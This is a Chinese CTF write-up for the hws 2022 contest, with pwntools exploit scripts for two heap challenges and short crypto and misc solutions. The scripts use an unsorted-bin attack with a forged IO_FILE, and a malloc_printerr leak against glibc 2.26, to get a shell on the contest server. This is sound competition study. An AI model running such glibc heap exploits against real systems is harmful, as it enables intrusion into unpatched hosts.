hws_2022_wp

pwn

送分题

一道原题https://www.anquanke.com/post/id/258512，Unsortbin Attack改Global_max_fast，然后劫持_IO_list_all，伪造一个io_file结构体，利用 _IO_str_finish来拿shell

exp

from pwn import *

context.log_level = 'debug'

binary = './pwn'
local = 0
if local:
	p = process(binary)
	libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
	p = remote('1.13.162.249', 10001)
	libc = ELF('./libc-2.27.so')
elf = ELF(binary)

# gdb.attach(p, 'b *$rebase(0xabd)')
p.sendlineafter('size?\n', str(0x1430))
p.sendlineafter('size?\n', str(0x5000))
p.sendlineafter(')\n', 'y')
libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 0x70 - libc.sym['__malloc_hook']
success('libc_base -> {}'.format(hex(libc_base)))
system = libc_base+libc.sym['system']
global_max_fast = libc_base + 0x3ed940
IO_list_all = libc_base + libc.sym['_IO_list_all']
IO_str_jumps = libc_base + 0x3e8360
binsh = 0x1b3e1a + libc_base
# pause()
payload = p64(libc_base+ 0x70 + libc.sym['__malloc_hook']) + p64(global_max_fast-0x10)
p.sendafter('name!\n', payload)
p.sendlineafter(')\n', '1')
binshsdd = 0x1b40fa + libc_base
IO_str_jumps = libc_base + 0x7f5020add360 - 0x7f50206f5000
fake_IO_FILE  = p64(0)*2
fake_IO_FILE += p64(0) + p64(binshsdd+1)
fake_IO_FILE += p64(0) + p64(0)
fake_IO_FILE += p64((binshsdd-100)/2) + p64(0)
fake_IO_FILE =  fake_IO_FILE.ljust(0xb0,'\x00')
fake_IO_FILE += p64(0xFFFFFFFFFFFFFFFF) + p64(0)*2
fake_IO_FILE += p64(IO_str_jumps)
fake_IO_FILE += p64(libc_base+libc.symbols['system'])
p.send(fake_IO_FILE)
p.interactive()

peach

这道题应该是祥云杯lemon改编来的，参考当时的官方解法

1. 在堆的分配、释放中检测到错误的时候，会调用malloc_printerr处理错误

2. 在glibc-2.26 以及之前的版本中， malloc_printerr会根据check_action的值执行不同的分支，在action & 1为true时，会打印程序名，存在leak

exp

from pwn import *

context.log_level = 'debug'

binary = './peachw'
local = 0
if local:
	p = process(binary)
	libc = ELF('./libc/libc-2.26.so')
else:
	p = remote('1.13.162.249', 10003)
	libc = ELF('./libc/libc-2.26.so')
elf = ELF(binary)

def add(index, name, size, content):
	p.send('\x01')
	p.sendlineafter('? ', str(index))
	p.sendafter(': \n', name)
	p.sendlineafter('peach:\n', str(size))
	rv = p.recvline()
	if b"descripe" in rv:
		p.send(content)
		p.recvuntil("Success!\n")

def free(index):
	p.sendafter('choice: ', '\x02')
	p.sendlineafter(' ?\n', str(index))

def show(index, num):
	p.sendafter('choice: ', '\x03')
	p.sendlineafter(' ? ', str(index))
	p.sendafter('number?\n', num)

def edit(index, size, content):
	p.sendafter('choice: ', '\x04')
	p.sendlineafter(' ? ', str(index))
	p.sendafter('peach : ', p16(size))
	p.sendafter('peach \n', content)

# gdb.attach(p)
p.sendafter('peach?\n', 'yes\x00'.ljust(0x1d, 'a'))
p.recvuntil('peach is ')
stack_addr = int(p.recv()[0:5], 10) - 96
success('stack_addr -> {}'.format(hex(stack_addr)))
add(0, 'a', 0x430, 'a')
free(0)

add(0, '\xa0', 0x300, p64(0) + p64(0x31))

add(1, 'a', 0x100, 'a')
add(2, 'a', 0x100, 'a')
edit(-36, 0x220, 'a'*0x198 + p16(stack_addr))
# pause()
free(2)
msg = p.recv()
if "flag" in msg:
	print(msg)
p.interactive()

crypto

babyrsa

在线分解n得到p和q

p=98197216341757567488149177586991336976901080454854408243068885480633972200382596026756300968618883148721598031574296054706280190113587145906781375704611841087782526897314537785060868780928063942914187241017272444601926795083433477673935377466676026146695321415853502288291409333200661670651818749836420808033
q=133639826298015917901017908376475546339925646165363264658181838203059432536492968144231040597990919971381628901127402671873954769629458944972912180415794436700950304720548263026421362847590283353425105178540468631051824814390421486132775876582962969734956410033443729557703719598998956317920674659744121941513

import gmpy2
from Crypto.Util.number import long_to_bytes

e=2199344405076718723439776106818391416986774637417452818162477025957976213477191723664184407417234793814926418366905751689789699138123658292718951547073938244835923378103264574262319868072792187129755570696127796856136279813658923777933069924139862221947627969330450735758091555899551587605175567882253565613163972396640663959048311077691045791516671857020379334217141651855658795614761069687029140601439597978203375244243343052687488606544856116827681065414187957956049947143017305483200122033343857370223678236469887421261592930549136708160041001438350227594265714800753072939126464647703962260358930477570798420877
p=98197216341757567488149177586991336976901080454854408243068885480633972200382596026756300968618883148721598031574296054706280190113587145906781375704611841087782526897314537785060868780928063942914187241017272444601926795083433477673935377466676026146695321415853502288291409333200661670651818749836420808033
q=133639826298015917901017908376475546339925646165363264658181838203059432536492968144231040597990919971381628901127402671873954769629458944972912180415794436700950304720548263026421362847590283353425105178540468631051824814390421486132775876582962969734956410033443729557703719598998956317920674659744121941513
c = 1492164290534197296766878830710549288168716657792979479408332026408553210558539364503279432780006256047888761718878241924947937039103166564146378209168719163067531460700424309878383312837345239570897122826051628153030129647363574035072755426112229160684859510640271933580581310029921376842631120847546030843821787623965614564745724229763999106839802052036834811357341644073138100679508864747009014415530176077648226083725813290110828240582884113726976794751006967153951269748482024859714451264220728184903144004573228365893961477199925864862018084224563883101101842275596219857205470076943493098825250412323522013524
n = p*q
phin = (q-1)*(p-1)
d = gmpy2.invert(e, phin)
print long_to_bytes(pow(c,d,n))

misc

badPDF

这也是个原题https://zyazhb.github.io/2020/08/16/ctf-hws/#fakepdf，最后用python写个解密脚本就可以

text = '676d60667a64333665326564333665326564333665326536653265643336656564333665327c'

j = 0
flag = ''
for i in range(len(text)//2):
	flag += chr(int(text[j:j+2], 16) ^ 1)
	j += 2
print(flag)
# flag{e27d3de27d3de27d3d7d3de27dde27d3}

gogogo

提取个压缩包

提取剪切板

最后提取出一个二维码，寄了，aztec啥的没听过。